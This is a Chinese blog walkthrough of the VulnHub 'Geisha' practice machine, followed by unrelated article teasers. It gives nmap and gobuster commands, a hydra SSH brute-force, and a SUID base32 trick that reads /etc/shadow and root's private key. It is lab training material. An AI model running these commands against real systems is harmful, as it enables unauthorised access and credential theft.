vulnhub - Geisha

news/2024/10/3 17:06:57

vulnhub - Geisha

描述

Machine Name: Geisha
Author : SunCSR
Goal: Get the root flag of the target.
Difficulty: Medium/Intermediate Level
DHCP Enabled
Tested: VMware Workstation 15.x Pro & VirtualBox 6.x (This works better with VMware rather than VirtualBox)

Your feedback is really valuable for me! suncsr.challenge@gmail.com

端口信息收集

端口扫描

nmap 192.168.157.0/24 
nmap -sT --min-rate 10000 -p- 192.168.157.168

image-20240617003227866

详细扫描

sudo nmap -sT -sC -sV -O -p21,22,80,7080,7125,8088,9198 192.168.157.168

image-20240617003446743

web目录扫描

访问web页面,只有一张图片,没有其他信息

image-20240617003750084

看了一眼也没什么信息,先扫目录

sudo gobuster dir -u http://192.168.157.168:7125/ -w /usr/share/wordlists/dirbuster/director-1.0.txt

image-20240617010113234

在端口7125扫到敏感文件了,下载下来

image-20240617010302978

看来应该是要先登入geisha再进行后续提权

geisha:x:1000:1000:geisha,,,:/home/geisha:/bin/bash

ssh爆破

也没得到什么别的信息了,那就爆破ssh

hydra -l geisha -P /usr/share/wordlists/rockyou.txt ssh://192.168.157.168

image-20240617011347862

爆了3-5分钟,得到密码letmein

提权

find / -perm -u=s -type f 2>/dev/null

image-20240617011932871

注意到有base32命令

base32 "/etc/shadow" | base32 --decode

image-20240617012712882

john没爆出来root的密码,那去尝试读取root用户的私钥文件

image-20240617013245708

取出后利用私钥登入root

image-20240617013629346

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.ryyt.cn/news/44558.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈,一经查实,立即删除!

相关文章

centos7的虚拟机只显示本地回环

问题:安装好的centos7的虚拟机只显示本地回环,没有其它网卡信息虚拟机 : centps7.9centos安装好后,登录成功后,输入ip a只显示本地127.0.0.1,而不显示ens33的网卡和ip信息,具体详情如下图所示:输入命令systemctl status network.service 不管得到的结果是下面的任意一个或…

纯碱

之前走出了5波驱动 阶段性反弹后 中期要跌的

【知识点】图与图论入门

两三个星期没有发布新文章了,今天再来讲一个新的数据结构:图。何为图论 见名知意,图论 (Graph Theory) 就是研究 图 (Graph) 的数学理论和方法。图是一种抽象的数据结构,由 节点 (Node) 和 连接这些节点的 边 (Edge) 组成。图论在计算机科学、网络分析、物流、社会网络分析…

ASP.NET Core之Serilog、SEQ、ILogger构建可视化日志

一、前言在上一章节中使用NLog+SEQ+ILogger构建可视化日志,本章基于Serilog来构建可视化日志。Serilog是.NET中一款非常出色的结构化日志的日志库,其与NLog对比在前一章节进行了说明。Serilog项目不仅仅包含核心项目Seirlog,而且还提供了很多接收器Sinks(超过100个),这些接…

【知识点】深度优先搜索 Depth First Search

深度优先搜索 Depth First Search去年发布的笔记,今年加以改编。 世界上只有两种人,一种是讨厌递归的人,另一种是讨厌递归后又重新爱上递归的人...搜索算法被广泛的应用在计算机领域中。搜索算法的本质就是通过暴力枚举以及模拟的方式来求得最终的答案。但普通的暴力枚举局限…

linux Typora修改Windows文件产生乱码(未解决)

问题如同所示,出现了乱码,而且不同于普通的乱码,英文字符之类的也没有保留下来(说明不是编码格式问题),反而出现了红圈中的那些本不存在的字符(搜了一下似乎和Oracle有关)。 未解决 我猜测是linux和windows的文件系统不同导致修改文件使得文件损坏。 只能说多做备份,幸…

LVGL库的bar控件

进度条(lv_bar) 概述 1.进度条对象(组件)有一个背景和一个指示器. 指示器的宽度根据进度条的当前值2.自动设置. 3.如果设置进度条的宽度小于其高度,就可以创建出垂直摆放的进度条 4.不仅可以设置结束,还可以设置进度条的起始值,从而改变指标的起始位置样式和零件 LV_PART_MAI…

CMake Tutorial (3.30-rc3版) 练习和点评

CMake Tutorial (3.30-rc3版) 练习和点评 CMake 官方文档提供了 CMake Tutorial, 目前最新版是 CMake-3.30-rc3, 有12个Step供用户练习。 CMake Tutorial 是从 CMake 3.16 版本开始能从官方网页找到, 并且每一版都有改进 Tutorial 内容。 作为有实际C/C++项目中大幅使用 CMa…